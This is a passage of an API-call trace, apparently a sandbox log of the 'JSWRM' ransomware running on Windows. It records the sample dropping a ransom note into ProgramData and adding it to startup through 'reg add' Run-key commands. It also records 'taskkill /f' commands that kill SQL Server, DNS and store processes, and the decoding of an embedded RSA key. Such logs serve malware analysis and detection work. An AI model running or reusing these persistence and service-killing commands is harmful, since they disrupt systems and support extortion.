RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x14) returned 0x1f65f8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x24) returned 0x1f5d98 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xd) returned 0x1ff9e0 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x17) returned 0x1f6738 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x2b) returned 0x1f8520 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x15) returned 0x1f64d8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x17) returned 0x1f66b8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x22) returned 0x1f5e58 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xe) returned 0x1ffa58 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xc1) returned 0x1f1630 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x3e) returned 0x1f2020 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1b) returned 0x1fc1c8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1d) returned 0x1fc1f0 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x48) returned 0x1ee910 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x12) returned 0x1f65b8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x18) returned 0x1f6418 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1b) returned 0x1fc3d0 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x24) returned 0x1f5df8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x29) returned 0x1f84b0 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1e) returned 0x1fc218 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x6b) returned 0x1f1570 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x17) returned 0x1f6778 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0xf) returned 0x1ffaa0 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x16) returned 0x1f6798 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x28) returned 0x1f5be8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x27) returned 0x1f5dc8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x12) returned 0x1f6618 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x21) returned 0x1f5c48 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x10) returned 0x1ffab8 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x1c) returned 0x1fc240 [0039.692] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x12) returned 0x1f66d8 [0039.692] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fec40 | out: hHeap=0x1e0000) returned 1 [0039.692] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0039.692] GetProcAddress (hModule=0x75e90000, lpProcName="FlsAlloc") returned 0x75ea4ae0 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="FlsFree") returned 0x75ea4b00 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="FlsGetValue") returned 0x75ea4b20 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="FlsSetValue") returned 0x75ea4b40 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="InitializeCriticalSectionEx") returned 0x75efebc0 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="InitOnceExecuteOnce") returned 0x74f95550 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="CreateEventExW") returned 0x75efeb20 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="CreateSemaphoreW") returned 0x75efeb90 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="CreateSemaphoreExW") returned 0x75efeb80 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="CreateThreadpoolTimer") returned 0x75ea6d30 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadpoolTimer") returned 0x77bfd7c0 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77bfb840 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="CloseThreadpoolTimer") returned 0x77bfb740 [0039.693] GetProcAddress (hModule=0x75e90000, lpProcName="CreateThreadpoolWait") returned 0x75ea6d70 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadpoolWait") returned 0x77bfc0b0 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="CloseThreadpoolWait") returned 0x77bfbe10 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="FlushProcessWriteBuffers") returned 0x77c22b20 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77c18e50 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="GetCurrentProcessorNumber") returned 0x77c152f0 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="CreateSymbolicLinkW") returned 0x75ea4510 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="GetCurrentPackageId") returned 0x74f9e260 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="GetTickCount64") returned 0x75ea0db0 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="GetFileInformationByHandleEx") returned 0x75ea43d0 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="SetFileInformationByHandle") returned 0x75eff110 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x75eff1e0 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="InitializeConditionVariable") returned 0x77c13a00 [0039.694] GetProcAddress (hModule=0x75e90000, lpProcName="WakeConditionVariable") returned 0x77c88c50 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="WakeAllConditionVariable") returned 0x77c18a90 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="SleepConditionVariableCS") returned 0x7500fca0 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="InitializeSRWLock") returned 0x77c13a00 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="AcquireSRWLockExclusive") returned 0x77bf58e0 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77c72ce0 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="ReleaseSRWLockExclusive") returned 0x77bf83a0 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="SleepConditionVariableSRW") returned 0x7500fcf0 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="CreateThreadpoolWork") returned 0x75ea6db0 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="SubmitThreadpoolWork") returned 0x77bfeb00 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="CloseThreadpoolWork") returned 0x77bfed50 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="CompareStringEx") returned 0x75ea7050 [0039.695] GetProcAddress (hModule=0x75e90000, lpProcName="GetLocaleInfoEx") returned 0x75ea7190 [0039.696] GetProcAddress (hModule=0x75e90000, lpProcName="LCMapStringEx") returned 0x75ea7480 [0039.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x800) returned 0x1fec40 [0039.696] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0039.696] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1333a01) returned 0x0 [0039.696] GetCurrentThread () returned 0xfffffffe [0039.696] GetThreadTimes (in: hThread=0xfffffffe, lpCreationTime=0xbcfb68, lpExitTime=0xbcfb70, lpKernelTime=0xbcfb70, lpUserTime=0xbcfb70 | out: lpCreationTime=0xbcfb68, lpExitTime=0xbcfb70, lpKernelTime=0xbcfb70, lpUserTime=0xbcfb70) returned 1 [0039.696] RtlInitializeSListHead (in: ListHead=0x1342d90 | out: ListHead=0x1342d90) [0039.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8248 [0039.696] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8478 [0039.697] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="kto_prochtet_tot_sdohnet =)") returned 0x1d0 [0039.697] WaitForSingleObject (hHandle=0x1d0, dwMilliseconds=0x0) returned 0x0 [0039.697] GetLastError () returned 0x0 [0039.698] CryptStringToBinaryA (in: pszString="MI2i6BWRFhcswznItBEl33UaIoDOwqI=", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0xbcfa50, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0xbcfa50, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17) returned 0x1f6458 [0039.698] CryptStringToBinaryA (in: pszString="MI2i6BWRFhcswznItBEl33UaIoDOwqI=", cchString=0x20, dwFlags=0x1, pbBinary=0x1f6458, pcbBinary=0xbcfa50, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1f6458, pcbBinary=0xbcfa50, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x408) returned 0x200d20 [0039.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x1fc128 [0039.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc128 | out: hHeap=0x1e0000) returned 1 [0039.698] CryptStringToBinaryA (in: pszString="MI2i6BWRFhcsw0n8tRAw03ocOs+DzqDQ", cchString=0x20, dwFlags=0x1, pbBinary=0x0, pcbBinary=0xbcfa70, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0xbcfa70, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18) returned 0x1f6478 [0039.698] CryptStringToBinaryA (in: pszString="MI2i6BWRFhcsw0n8tRAw03ocOs+DzqDQ", cchString=0x20, dwFlags=0x1, pbBinary=0x1f6478, pcbBinary=0xbcfa70, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1f6478, pcbBinary=0xbcfa70, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0039.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x408) returned 0x201130 [0039.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x1fc308 [0039.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc308 | out: hHeap=0x1e0000) returned 1 [0039.698] LoadLibraryExW (lpLibFileName="api-ms-win-core-sysinfo-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x74ea0000 [0039.698] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x74f6b830 [0039.698] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0xbcfa70 | out: lpSystemTimeAsFileTime=0xbcfa70) [0039.698] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0039.699] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] GetLastError () returned 0x0 [0039.699] SetLastError (dwErrCode=0x0) [0039.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0039.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x1fc290 [0039.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8210 [0039.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x1ee268 [0039.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8210 | out: hHeap=0x1e0000) returned 1 [0039.699] GetFileAttributesW (lpFileName="C:\\ProgramData\\JSWRM-DECRYPT.hta" (normalized: "c:\\programdata\\jswrm-decrypt.hta")) returned 0xffffffff [0039.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ee268 | out: hHeap=0x1e0000) returned 1 [0039.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0039.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0xbcc928, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0039.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x1fc128 [0039.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x201540 [0039.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc128 | out: hHeap=0x1e0000) returned 1 [0039.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x203310 [0039.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x201540 | out: hHeap=0x1e0000) returned 1 [0039.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f86a8 [0039.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x1ee268 [0039.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f86a8 | out: hHeap=0x1e0000) returned 1 [0039.700] CreateFileW (lpFileName="C:\\ProgramData\\JSWRM-DECRYPT.hta" (normalized: "c:\\programdata\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0039.703] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0039.703] WriteFile (in: hFile=0x1d4, lpBuffer=0xbcca3c*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0xbcca08, lpOverlapped=0x0 | out: lpBuffer=0xbcca3c*, lpNumberOfBytesWritten=0xbcca08*=0x230c, lpOverlapped=0x0) returned 1 [0039.705] CloseHandle (hObject=0x1d4) returned 1 [0039.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ee268 | out: hHeap=0x1e0000) returned 1 [0039.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203310 | out: hHeap=0x1e0000) returned 1 [0039.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc290 | out: hHeap=0x1e0000) returned 1 [0039.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0039.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0xbcfad8, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0039.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x1ee490 [0039.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa7) returned 0x1eff78 [0039.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ee490 | out: hHeap=0x1e0000) returned 1 [0039.707] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters=" /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0049.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1eff78 | out: hHeap=0x1e0000) returned 1 [0049.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0049.447] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0xbcfaa8, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0049.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0049.447] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa7) returned 0x217b40 [0049.447] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0049.447] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters=" /c reg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0050.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0050.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cff8 [0050.292] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters=" /c taskkill.exe taskkill /f /im store.exe", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0051.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cff8 | out: hHeap=0x1e0000) returned 1 [0051.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0051.090] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters=" /c taskkill.exe taskkill /f /im sqlserver.exe", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0052.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0052.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cee0 [0052.955] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters=" /c taskkill.exe taskkill /f /im dns.exe", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0054.421] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cee0 | out: hHeap=0x1e0000) returned 1 [0054.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d180 [0054.421] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd.exe", lpParameters=" /c taskkill.exe taskkill /f /im sqlwriter.exe", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0055.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d180 | out: hHeap=0x1e0000) returned 1 [0055.999] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0xbcfa10 | out: lpSystemTimeAsFileTime=0xbcfa10) [0055.999] GetLastError () returned 0x0 [0055.999] SetLastError (dwErrCode=0x0) [0055.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0055.999] GetLastError () returned 0x0 [0055.999] SetLastError (dwErrCode=0x0) [0055.999] GetLastError () returned 0x0 [0055.999] SetLastError (dwErrCode=0x0) [0055.999] GetLastError () returned 0x0 [0055.999] SetLastError (dwErrCode=0x0) [0055.999] GetLastError () returned 0x0 [0055.999] SetLastError (dwErrCode=0x0) [0055.999] GetLastError () returned 0x0 [0055.999] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.000] SetLastError (dwErrCode=0x0) [0056.000] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] GetLastError () returned 0x0 [0056.001] SetLastError (dwErrCode=0x0) [0056.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d1b8 [0056.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0056.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0056.001] Sleep (dwMilliseconds=0x3e8) [0057.049] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0xbcfa10 | out: lpSystemTimeAsFileTime=0xbcfa10) [0057.051] GetLastError () returned 0x0 [0057.053] SetLastError (dwErrCode=0x0) [0057.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0057.055] GetLastError () returned 0x0 [0057.055] SetLastError (dwErrCode=0x0) [0057.056] GetLastError () returned 0x0 [0057.056] SetLastError (dwErrCode=0x0) [0057.058] GetLastError () returned 0x0 [0057.063] SetLastError (dwErrCode=0x0) [0057.065] GetLastError () returned 0x0 [0057.065] SetLastError (dwErrCode=0x0) [0057.067] GetLastError () returned 0x0 [0057.067] SetLastError (dwErrCode=0x0) [0057.068] GetLastError () returned 0x0 [0057.068] SetLastError (dwErrCode=0x0) [0057.070] GetLastError () returned 0x0 [0057.070] SetLastError (dwErrCode=0x0) [0057.072] GetLastError () returned 0x0 [0057.072] SetLastError (dwErrCode=0x0) [0057.072] GetLastError () returned 0x0 [0057.072] SetLastError (dwErrCode=0x0) [0057.072] GetLastError () returned 0x0 [0057.073] SetLastError (dwErrCode=0x0) [0057.073] GetLastError () returned 0x0 [0057.073] SetLastError (dwErrCode=0x0) [0057.073] GetLastError () returned 0x0 [0057.073] SetLastError (dwErrCode=0x0) [0057.073] GetLastError () returned 0x0 [0057.073] SetLastError (dwErrCode=0x0) [0057.073] GetLastError () returned 0x0 [0057.073] SetLastError (dwErrCode=0x0) [0057.073] GetLastError () returned 0x0 [0057.073] SetLastError (dwErrCode=0x0) [0057.073] GetLastError () returned 0x0 [0057.073] SetLastError (dwErrCode=0x0) [0057.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241088 [0057.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0057.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d030 [0057.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x47) returned 0x2373f8 [0057.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d030 | out: hHeap=0x1e0000) returned 1 [0057.073] CryptStringToBinaryA (in: pszString="BgIAAACkAABSU0ExABAAAAEAAQBpZrGSy1o5rPd2ZnK+T3kb7Kd/hpd3POG7b9gDp5F1AhYFkm8wvR3DUyLsrbcx4IQ7TvkaNbKAl89gZaC20mWDO0W5ZPIl0Xc3cykLa+uekrhjPf7SxnnhNcEZ7Mf/7DoPdNGBh1/E9NhfZJo+YtEPmZmKPcV11Y0ftdjWQYOix1ejyuOrmrWTMFj82XDvl9tO8eMAzLHO8UQEVnOHcPMO1nzBMaBCFWchBdpIMP4KF6hpGN97lBzPYbRewls6zJ9pAcaqnsaQSndI0EhL5OoPmqsR+3TmmXVKOCqICoG9Lg1hxFSgAsKz4cZ9iSZ3DzmmSrH88Ltk3EgmQB1z8Cyu2oDp14SAL+7Y3JIGWA2++7jkUVmQZmKdAKCVXHaVp3v04LXXBtBhXQxtays7vwnpEvOHS8FjL5clNzHdWpIoKQIX41ajjGH9YVL7puyK+izYPyn3HQz62QaEq8cbqExS00PmrwFX8/DfB4ODGiUQxLICsYyWenmrUqjOrMXSkNILqrrybY9NZqGiPwZ1FnkoZ+l/gArD30xPAw3f5rZg+uQdgdWQj9SVNrHjSD2ulCaWfKy5nVWdc/JBclXYrJyXBuZB9+DtXivY6X06pCoxrjVBJAIpj3RabnRXsBkqyvL4tG2JlLILsUozcDVR14weDWMWgsvPSu9d/rNUE2fHyg==", cchString=0x2c8, dwFlags=0x1, pbBinary=0x0, pcbBinary=0xbcfa74, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0xbcfa74, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0057.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x214) returned 0x2194a0 [0057.073] CryptStringToBinaryA (in: 